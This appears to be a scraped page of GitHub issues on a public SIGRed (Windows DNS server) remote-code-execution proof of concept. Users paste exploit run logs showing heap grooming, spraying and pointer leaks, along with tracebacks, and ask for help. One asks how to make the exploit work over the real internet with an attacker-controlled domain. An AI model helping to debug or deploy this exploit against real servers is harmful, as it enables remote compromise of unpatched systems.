chompie1337 / sigred_rce_poc Goto Github PK

Thank you for helping me successfully reproduce this exploit in an experimental environment. But there are still some problems in the public network environment. I let the DNS server be configured by default and follow your steps. But it doesn't work. Sometimes the heap address couldn't be leaked successfully. And another error has been obtained several times，it seems that after obtaining dns!_imp_exit, the address of msvcrt!exit couldn't be leaked successfully. Spontaneous DNS requests from the server could affect the address assigned by the dns!NsecDNSRecordConvert function，is it? Could you reproduce this exploit over real internet? I hope to find steps that have been missed.

Thanks!

Hello, can you please help me with setting up your script to work over Internet. I've registered my domain evildomain.com and created a glue dns record for it ns1.evildomain.com. And I have one question for you, do I need to setup real DNS on my vps (ns1.evildomain.com) or launching evildns.py is enough for success?

Hello 👋

I run a security community that finds and fixes vulnerabilities in OSS. A researcher (@jhond0e) has found a potential issue, which I would be eager to share with you.

Could you add a SECURITY.md file with an e-mail address for me to send further details to? GitHub recommends a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future.

Looking forward to hearing from you 👍

(cc @huntr-helper)

I am receiving this error after installing payload-api and running evildns.py. I have searched the init file for references to system_arg and every other file in the package but I cannot find the reference to this module. I noticed this is used in a binary concatenation so it is likely just a string, do you have the string or are you able to point me to where to find it?

Hi,

I'm getting the following when attempting to exploit. Any ideas ?

─# python3 exploit.py -ip 10.0.2.100 -d vbsigred.com
[!] grooming small buffer size freelist
Waiting for small cached records to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163
[!] doing DNS record heap spray
[!] waiting for target subdomain record to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123
[!] triggering realloc and overflow
[!] triggering free for fake timeout object
[!] triggering timeout object allocations
[!] triggering frees for heap ptr leak
[!] triggering heap ptr leak
Traceback (most recent call last):
File "/root/tools/SIGRed_RCE_PoC/exploit.py", line 259, in
main()
File "/root/tools/SIGRed_RCE_PoC/exploit.py", line 255, in main
do_rce(args.ip, args.domain)
File "/root/tools/SIGRed_RCE_PoC/exploit.py", line 117, in do_rce
hl64_bytes = sigs[11].encode('ascii')
IndexError: list index out of range

Hi,

Thank you for your effort. However, when I tested this on Kali Linux 2020.4 I get two different errors. Is there anything I can do to fix them?

Thanks!

Error

[!] triggering heap ptr leak
Traceback (most recent call last):
File "/home/jerad/SIGRed_RCE_PoC/exploit.py", line 259, in
main()
File "/home/jerad/SIGRed_RCE_PoC/exploit.py", line 255, in main
do_rce(args.ip, args.domain)
File "/home/jerad/SIGRed_RCE_PoC/exploit.py", line 117, in do_rce
hl64_bytes = sigs[11].encode('ascii')
IndexError: list index out of range

heapleak

Heapleakb64 output:

└─$ cat heapleakb64
Server: 172.16.0.97
Address: 172.16.0.97#53

** server can't find 9.dz.evilcorp.local: NXDOMAIN

Network Time

Less than 15 min

OS:

Server 2012

DNS Bin:

dns.zip

heapleakb64:
Non-authoritative answer:
*** Can't find 9.dz.[my_evil_domain]: No answer

[!] grooming small buffer size freelist Waiting for small cached records to be freed 0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163 [!] doing DNS record heap spray [!] waiting for target subdomain record to be freed 0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123 [!] triggering realloc and overflow [!] triggering free for fake timeout object [!] triggering timeout object allocations [!] triggering frees for heap ptr leak [!] triggering heap ptr leak Traceback (most recent call last): File "exploit.py", line 221, in <module> main() File "exploit.py", line 217, in main do_rce(args.ip, args.domain) File "exploit.py", line 96, in do_rce hl64_bytes = sigs[11].encode('ascii') IndexError: list index out of range

Running on Kali2021 against Server 2016 without patch

[!] triggering free for fake timeout object
[!] triggering timeout object allocations
[!] triggering frees for heap ptr leak
[!] triggering heap ptr leak
Traceback (most recent call last):
File "/SIGRed_RCE_PoC-main/exploit2.py", line 260, in
main()
File "/SIGRed_RCE_PoC-main/exploit2.py", line 256, in main
do_rce(args.ip, args.domain)
File "/SIGRed_RCE_PoC-main/exploit2.py", line 121, in do_rce
heap_ptr = struct.unpack('<Q', data_bytes[33:41])[0]
struct.error: unpack requires a buffer of 8 bytes

Hey @chompie1337, thanks for your hard work.

I've been trying to test this exploit in a closed environment (Server 2016, 1607) and each execution (including a restart) triggers a different error. On most of the cases, it was as previously reported here with the 8-byte error.

The most recent error I had is as follows:

In addition, I changed the network DNS settings of the server to itself only, and set the timeout interval in the Conditional Forwarder setting from 5 to 1, and this is how I actually went further from the other errors.

I can provide the other error log files as well (heapleak, heapleak64 etc).

EDIT:
Based on the logs and since I do have exitleak (including a manual check that showed the offset do exists in the offset file), I suspect that the file is not parsed properly as it's being written using os.command and not native python.
In addition, testing "pexit & 0xFFF" returns 0, which is super strange.

Thanks a lot!

• when trying to exloit this PoC in Windows Server 2008 R2, I got an error about "List Index Out of range"
  Please help me; I use Ubuntu 20.04 to exploit.
  

[!] grooming small buffer size freelist
Waiting for small cached records to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163
[!] doing DNS record heap spray
[!] waiting for target subdomain record to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123
[!] triggering realloc and overflow
[!] triggering free for fake timeout object
[!] triggering timeout object allocations
[!] triggering frees for heap ptr leak
[!] triggering heap ptr leak
Traceback (most recent call last):
  File "exploit.py", line 259, in <module>
    main()
  File "exploit.py", line 255, in main
    do_rce(args.ip, args.domain)
  File "exploit.py", line 120, in do_rce
    heap_ptr = struct.unpack('<Q', data_bytes[33:41])[0]
struct.error: unpack requires a buffer of 8 bytes

heapleakb64:

Server:		*.*.*.*
Address:		*.*.*.*#53

Non-authoritative answer:
9.dz.[evildomain]	signature = A 5 0 8192 20250715184655 20190715184655 40452 9.dz.[evildomain]. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA

Authoritative answers can be found from:

I have tried some different versions of Windows Server 2016, 2012, 2012R2, 2008. However, it is not successful. Can you provide some build version of your testbed?

I am trying the exploit with conditional forwarding.
Output after running exploit.py :
$ sudo python3 exploit.py -ip 192.168.146.136 -d kedar.ee
[!] grooming small buffer size freelist
Waiting for small cached records to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163
[!] doing DNS record heap spray
[!] waiting for target subdomain record to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123
[!] triggering realloc and overflow
[!] triggering free for fake timeout object
[!] triggering timeout object allocations
[!] triggering frees for heap ptr leak
[!] triggering heap ptr leak
[+] controllable heap addr: 0x28acd3567d0
[!] waiting for timeout object allocation
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123
[!] triggering dns!RR_Free addr leak
[-] Could not find dns offsets!
DNS leak 64 file :

Windows version screen shot :